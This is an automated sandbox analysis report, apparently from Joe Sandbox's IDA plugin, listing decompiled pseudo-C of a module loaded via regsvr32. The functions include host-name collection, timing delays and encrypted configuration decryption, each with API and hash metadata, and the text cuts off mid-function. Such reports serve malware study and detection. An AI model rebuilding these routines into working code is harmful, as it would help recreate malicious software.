                    				intOrPtr _v8;
                    				void* _v12;
                    				void* _v16;
                    				intOrPtr _t26;
                    				intOrPtr* _t28;
                    				intOrPtr _t31;
                    				intOrPtr* _t32;
                    				void* _t39;
                    				int _t46;
                    				intOrPtr* _t47;
                    				int _t48;
                    
                    				_t47 = __eax;
                    				_push( &_v12);
                    				_push(__eax);
                    				_t39 = 0;
                    				_t46 = 0; // executed
                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                    				_v8 = _t26;
                    				if(_t26 < 0) {
                    					L13:
                    					return _v8;
                    				}
                    				if(_v12 == 0) {
                    					Sleep(0xc8);
                    					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                    				}
                    				if(_v8 >= _t39) {
                    					_t28 = _v12;
                    					if(_t28 != 0) {
                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                    						_v8 = _t31;
                    						if(_t31 >= 0) {
                    							_t46 = lstrlenW(_v16);
                    							if(_t46 != 0) {
                    								_t46 = _t46 + 1;
                    								_t48 = _t46 + _t46;
                    								_t39 = E04F963FD(_t48);
                    								if(_t39 == 0) {
                    									_v8 = 0x8007000e;
                    								} else {
                    									memcpy(_t39, _v16, _t48);
                    								}
                    								__imp__#6(_v16);
                    							}
                    						}
                    						_t32 = _v12;
                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                    					}
                    					 *_a4 = _t39;
                    					 *_a8 = _t46 + _t46;
                    				}
                    				goto L13;
                    			}















                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 62ae9a8b9dd7781415fd1f253bfb7a7f9a38b97b0c38c1550d8a2c01f81ba8e1
                    • Instruction ID: d2de3f987403c62c0da2a6df7700739d9928e29f82c88183cda82255e58e0a62
                    • Opcode Fuzzy Hash: 62ae9a8b9dd7781415fd1f253bfb7a7f9a38b97b0c38c1550d8a2c01f81ba8e1
                    • Instruction Fuzzy Hash: 29212C76A01209FFEF11DFA4D88499EBBF8EF49300B1045A9E955D7210EB71AE06CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E04F92A4C(void* __ecx, intOrPtr _a4) {
                    				struct _FILETIME _v12;
                    				int _t13;
                    				signed int _t16;
                    				void* _t18;
                    				signed int _t19;
                    				unsigned int _t23;
                    				void* _t30;
                    				signed int _t34;
                    
                    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                    				asm("stosd");
                    				do {
                    					_t13 = SwitchToThread();
                    					GetSystemTimeAsFileTime( &_v12);
                    					_t23 = _v12.dwHighDateTime;
                    					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                    					_push(0);
                    					_push(0x13);
                    					_push(_t23 >> 5);
                    					_push(_t16);
                    					L04F982E6();
                    					_t34 = _t16 + _t13;
                    					_t18 = E04F92888(_a4, _t34);
                    					_t30 = _t18;
                    					_t19 = 3;
                    					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                    				} while (_t30 == 1);
                    				return _t30;
                    			}












                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04F94610,?,?), ref: 04F92A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04F94610,?,?), ref: 04F92A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04F92A82
                      • Part of subcall function 04F92888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04F928E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04F94610,?,?), ref: 04F92AA1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: a80d411c4f81de76ae8d7ab979fddcd6049233ad706ee26e5055b1d29629ff57
                    • Instruction ID: 2100578fcba32408b68c6590f9ea323530ef1f2ad24bb0e2354180981d6fb1e7
                    • Opcode Fuzzy Hash: a80d411c4f81de76ae8d7ab979fddcd6049233ad706ee26e5055b1d29629ff57
                    • Instruction Fuzzy Hash: 90F0A4B3A40108BBEB149BA4DC19F9F7AE8DB85355F110568F611E7340E9B8AE01C6A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 47%
                    			E04F93B61(char* _a4, char** _a8) {
                    				char* _t7;
                    				char* _t11;
                    				char* _t14;
                    				char* _t16;
                    				char* _t17;
                    				char _t18;
                    				signed int _t20;
                    				signed int _t22;
                    
                    				_t16 = _a4;
                    				_push(0x20);
                    				_t20 = 1;
                    				_push(_t16);
                    				while(1) {
                    					_t7 = StrChrA();
                    					if(_t7 == 0) {
                    						break;
                    					}
                    					_t20 = _t20 + 1;
                    					_push(0x20);
                    					_push( &(_t7[1]));
                    				}
                    				_t11 = E04F963FD(_t20 << 2);
                    				_a4 = _t11;
                    				if(_t11 != 0) {
                    					StrTrimA(_t16, 0x4f99284); // executed
                    					_t22 = 0;
                    					do {
                    						_t14 = StrChrA(_t16, 0x20);
                    						if(_t14 != 0) {
                    							 *_t14 = 0;
                    							do {
                    								_t14 =  &(_t14[1]);
                    								_t18 =  *_t14;
                    							} while (_t18 == 0x20 || _t18 == 9);
                    						}
                    						_t17 = _a4;
                    						 *(_t17 + _t22 * 4) = _t16;
                    						_t22 = _t22 + 1;
                    						_t16 = _t14;
                    					} while (_t14 != 0);
                    					 *_a8 = _t17;
                    				}
                    				return 0;
                    			}












                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,05AC95AC,?,?,04F9104B,?,05AC95AC), ref: 04F93B7D
                    • StrTrimA.SHLWAPI(?,04F99284,00000002,?,04F9104B,?,05AC95AC), ref: 04F93B9B
                    • StrChrA.SHLWAPI(?,00000020,?,04F9104B,?,05AC95AC), ref: 04F93BA6
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: eb372cee8089758ebb6a9d318cfc35438e3e8f578a405ef039913ec89552a97c
                    • Instruction ID: 65c8dea0cea3243ce5daad0f3940e7a4201c81d82e3b6bc77ab19b86d38a37a5
                    • Opcode Fuzzy Hash: eb372cee8089758ebb6a9d318cfc35438e3e8f578a405ef039913ec89552a97c
                    • Instruction Fuzzy Hash: 010171B27003456FFB505E2A9C45F573BDDEBCD794F044011AE55CB291DA70EC438660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F9607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                    				int _v12;
                    				signed int _v16;
                    				void* _v20;
                    				signed char _v36;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t35;
                    				signed char* _t46;
                    				int _t53;
                    				void* _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t46 = _a4;
                    				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                    				_v12 = 0x110;
                    				_t24 = E04F963FD(_t53);
                    				_a4 = _t24;
                    				if(_t24 != 0) {
                    					memcpy(_t24,  *0x4f9a374, 0x110);
                    					_t27 =  *0x4f9a378; // 0x0
                    					_t57 = _t56 + 0xc;
                    					if(_t27 != 0) {
                    						_t51 = _a4;
                    						E04F943A6(0x110, _a4, _t27, 0);
                    					}
                    					if(E04F95B65( &_v36) != 0) {
                    						_t35 = E04F94872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                    						if(_t35 == 0) {
                    							_t55 = _v20;
                    							_v36 =  *_t46;
                    							_v16 = E04F96412(_t55, _a8, _t51, _t46, _a12);
                    							 *(_t55 + 4) = _v36;
                    							_t20 =  &(_t46[4]); // 0xbf0845c7
                    							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                    							_t57 = _t57 + 0xc;
                    							E04F917AB(_t55);
                    						}
                    					}
                    					memset(_a4, 0, _t53);
                    					E04F917AB(_a4);
                    				}
                    				return _v16;
                    			}
















                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memcpy.NTDLL(00000000,00000110,?,?,?,?,04F94DD9,?,04F93AC6,04F93AC6,?), ref: 04F960B3
                    • memset.NTDLL ref: 04F96128
                    • memset.NTDLL ref: 04F9613C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memset$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 1529149438-0
                    • Opcode ID: 8e95fbccf12db9527729c8def768fbdb19c2e705ea15e7163666c1794ffd2be7
                    • Instruction ID: 8c27728d83601d40bac3f7776de426dede58848e4ff28a75e2a71071fc687ab3
                    • Opcode Fuzzy Hash: 8e95fbccf12db9527729c8def768fbdb19c2e705ea15e7163666c1794ffd2be7
                    • Instruction Fuzzy Hash: 36215A71E00219ABFF11AF65CD40FAEBBF8AF08644F044025E904E6251E735AE428BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04F95F80(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                    				void* _v8;
                    				void* __esi;
                    				intOrPtr* _t35;
                    				void* _t40;
                    				intOrPtr* _t41;
                    				intOrPtr* _t43;
                    				intOrPtr* _t45;
                    				intOrPtr* _t50;
                    				intOrPtr* _t52;
                    				void* _t54;
                    				intOrPtr* _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t61;
                    				intOrPtr* _t65;
                    				intOrPtr _t68;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    
                    				_t55 = _a4;
                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                    				_a4 = 0;
                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                    				if(_t76 < 0) {
                    					L18:
                    					return _t76;
                    				}
                    				_t40 = E04F914E4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                    				_t76 = _t40;
                    				if(_t76 >= 0) {
                    					_t61 = _a28;
                    					if(_t61 != 0 &&  *_t61 != 0) {
                    						_t52 = _v8;
                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                    					}
                    					if(_t76 >= 0) {
                    						_t43 =  *_t55;
                    						_t68 =  *0x4f9a320; // 0xb2d5a8
                    						_t20 = _t68 + 0x4f9b1fc; // 0x740053
                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                    						if(_t76 >= 0) {
                    							_t76 = E04F963B0(_a4);
                    							if(_t76 >= 0) {
                    								_t65 = _a28;
                    								if(_t65 != 0 &&  *_t65 == 0) {
                    									_t50 = _a4;
                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                    								}
                    							}
                    						}
                    						_t45 = _a4;
                    						if(_t45 != 0) {
                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                    						}
                    						_t57 = __imp__#6;
                    						if(_a20 != 0) {
                    							 *_t57(_a20);
                    						}
                    						if(_a12 != 0) {
                    							 *_t57(_a12);
                    						}
                    					}
                    				}
                    				_t41 = _v8;
                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                    				goto L18;
                    			}






















                    APIs
                      • Part of subcall function 04F914E4: SysAllocString.OLEAUT32(80000002), ref: 04F9153B
                      • Part of subcall function 04F914E4: SysFreeString.OLEAUT32(00000000), ref: 04F915A0
                    • SysFreeString.OLEAUT32(?), ref: 04F9605F
                    • SysFreeString.OLEAUT32(04F92BCC), ref: 04F96069
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F92985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                    				void* _t24;
                    				signed short _t25;
                    				signed int _t27;
                    				intOrPtr* _t28;
                    				signed short _t29;
                    
                    				_t28 = __edi;
                    				if(_a4 == 0) {
                    					L2:
                    					_t29 = E04F91BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                    					if(_t29 == 0) {
                    						_t27 = _a12 >> 1;
                    						if(_t27 == 0) {
                    							_t29 = 2;
                    							HeapFree( *0x4f9a2d8, 0, _a4);
                    						} else {
                    							_t24 = _a4;
                    							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                    							 *_t28 = _t24;
                    						}
                    					}
                    					L6:
                    					return _t29;
                    				}
                    				_t25 = E04F93CEA(_a4, _a8, _a12, __edi); // executed
                    				_t29 = _t25;
                    				if(_t29 == 0) {
                    					goto L6;
                    				}
                    				goto L2;
                    			}









                    APIs
                      • Part of subcall function 04F93CEA: SysFreeString.OLEAUT32(00000000), ref: 04F93D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04F933D6,?,004F0053,05AC93D8,00000000,?), ref: 04F929E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E04F9256F(void* __ecx) {
                    				signed int _v8;
                    				void* _t15;
                    				void* _t19;
                    				void* _t20;
                    				void* _t22;
                    				intOrPtr* _t23;
                    
                    				_t23 = __imp__;
                    				_t20 = 0;
                    				_v8 = _v8 & 0;
                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					_t20 = E04F963FD(_t10 + 1);
                    					if(_t20 != 0) {
                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                    						if(_t15 != 0) {
                    							 *((char*)(_v8 + _t20)) = 0;
                    						} else {
                    							E04F917AB(_t20);
                    							_t20 = 0;
                    						}
                    					}
                    				}
                    				return _t20;
                    			}










                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04F96999), ref: 04F92587
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04F96999), ref: 04F925A4
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F945D2(signed int __edx, intOrPtr _a4) {
                    				void* _t3;
                    				void* _t5;
                    				void* _t8;
                    				void* _t9;
                    				void* _t10;
                    				signed int _t11;
                    
                    				_t11 = __edx;
                    				_t3 = HeapCreate(0, 0x400000, 0); // executed
                    				 *0x4f9a2d8 = _t3;
                    				if(_t3 == 0) {
                    					_t9 = 8;
                    					return _t9;
                    				}
                    				 *0x4f9a1c8 = GetTickCount();
                    				_t5 = E04F95A5A(_a4);
                    				if(_t5 == 0) {
                    					E04F92A4C(_t10, _a4); // executed
                    					if(E04F94C43(_t10) != 0) {
                    						 *0x4f9a300 = 1; // executed
                    					}
                    					_t8 = E04F96535(_t11); // executed
                    					return _t8;
                    				}
                    				return _t5;
                    			}










                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,04F9108E,?), ref: 04F945DB
                    • GetTickCount.KERNEL32 ref: 04F945EF
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E04F93CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v12;
                    				void* _v18;
                    				short _v20;
                    				intOrPtr _t15;
                    				short _t17;
                    				intOrPtr _t19;
                    				short _t23;
                    
                    				_t23 = 0;
                    				_v20 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				_t15 =  *0x4f9a320; // 0xb2d5a8
                    				_t4 = _t15 + 0x4f9b39c; // 0x5ac8944
                    				_t20 = _t4;
                    				_t6 = _t15 + 0x4f9b124; // 0x650047
                    				_t17 = E04F95F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                    				if(_t17 < 0) {
                    					_t23 = _t17;
                    				} else {
                    					if(_v20 != 8) {
                    						_t23 = 1;
                    					} else {
                    						_t19 = E04F92E8A(_t20, _v12);
                    						if(_t19 == 0) {
                    							_t23 = 8;
                    						} else {
                    							 *_a16 = _t19;
                    						}
                    						__imp__#6(_v12);
                    					}
                    				}
                    				return _t23;
                    			}











                    APIs
                      • Part of subcall function 04F95F80: SysFreeString.OLEAUT32(?), ref: 04F9605F
                      • Part of subcall function 04F92E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04F925F5,004F0053,00000000,?), ref: 04F92E93
                      • Part of subcall function 04F92E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04F925F5,004F0053,00000000,?), ref: 04F92EBD
                      • Part of subcall function 04F92E8A: memset.NTDLL ref: 04F92ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04F93D50
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E04F956CF(intOrPtr* __edi) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _t15;
                    				intOrPtr* _t21;
                    
                    				_t21 = __edi;
                    				_push( &_v12);
                    				_push(__edi);
                    				_v8 = 0x1d4c0;
                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                    				while(1) {
                    					_v16 = _t15;
                    					Sleep(0x1f4); // executed
                    					if(_v12 == 4) {
                    						break;
                    					}
                    					if(_v8 == 0) {
                    						L4:
                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                    						continue;
                    					} else {
                    						if(_v8 <= 0x1f4) {
                    							_v16 = 0x80004004;
                    						} else {
                    							_v8 = _v8 - 0x1f4;
                    							goto L4;
                    						}
                    					}
                    					L8:
                    					return _v16;
                    				}
                    				goto L8;
                    			}









                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04F97885(void* __ecx, void* __edx, void* _a4, void* _a8) {
                    				void* _t13;
                    				void* _t21;
                    
                    				_t11 =  &_a4;
                    				_t21 = 0;
                    				__imp__( &_a8);
                    				_t13 = E04F94872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                    				if(_t13 == 0) {
                    					_t21 = E04F963FD(_a8 + _a8);
                    					if(_t21 != 0) {
                    						E04F9213D(_a4, _t21, _t23);
                    					}
                    					E04F917AB(_a4);
                    				}
                    				return _t21;
                    			}






                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,04F9191E,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F97896
                      • Part of subcall function 04F94872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04F93AC6), ref: 04F948AA
                      • Part of subcall function 04F94872: memcpy.NTDLL(?,04F93AC6,00000010,?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9), ref: 04F948C3
                      • Part of subcall function 04F94872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04F948EC
                      • Part of subcall function 04F94872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04F94904
                      • Part of subcall function 04F94872: memcpy.NTDLL(00000000,04F94DD9,04F93AC6,0000011F), ref: 04F94956
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F94DC8(void* __edi, void* _a4) {
                    				int _t7;
                    				int _t12;
                    
                    				_t7 = E04F9607D(__edi, _a4,  &_a4); // executed
                    				_t12 = _t7;
                    				if(_t12 != 0) {
                    					memcpy(__edi, _a4, _t12);
                    					 *((char*)(__edi + _t12)) = 0;
                    					E04F917AB(_a4);
                    				}
                    				return _t12;
                    			}






                    APIs
                      • Part of subcall function 04F9607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04F94DD9,?,04F93AC6,04F93AC6,?), ref: 04F960B3
                      • Part of subcall function 04F9607D: memset.NTDLL ref: 04F96128
                      • Part of subcall function 04F9607D: memset.NTDLL ref: 04F9613C
                    • memcpy.NTDLL(?,04F93AC6,00000000,?,04F93AC6,04F93AC6,?,?,04F93AC6,?), ref: 04F94DE4
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E04F94EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                    				int _v8;
                    				void* _v12;
                    				void* _v16;
                    				signed int _t28;
                    				signed int _t33;
                    				signed int _t39;
                    				char* _t45;
                    				char* _t46;
                    				char* _t47;
                    				char* _t48;
                    				char* _t49;
                    				char* _t50;
                    				void* _t51;
                    				void* _t52;
                    				void* _t53;
                    				intOrPtr _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				signed int _t61;
                    				intOrPtr _t64;
                    				signed int _t65;
                    				signed int _t70;
                    				void* _t72;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t98;
                    				void* _t101;
                    				void* _t102;
                    				void* _t115;
                    				void* _t118;
                    				intOrPtr _t121;
                    
                    				_t118 = __esi;
                    				_t115 = __edi;
                    				_t104 = __ecx;
                    				_t101 = __ebx;
                    				_t28 =  *0x4f9a31c; // 0x69b25f44
                    				if(E04F94451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                    					 *0x4f9a374 = _v8;
                    				}
                    				_t33 =  *0x4f9a31c; // 0x69b25f44
                    				if(E04F94451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                    					_v12 = 2;
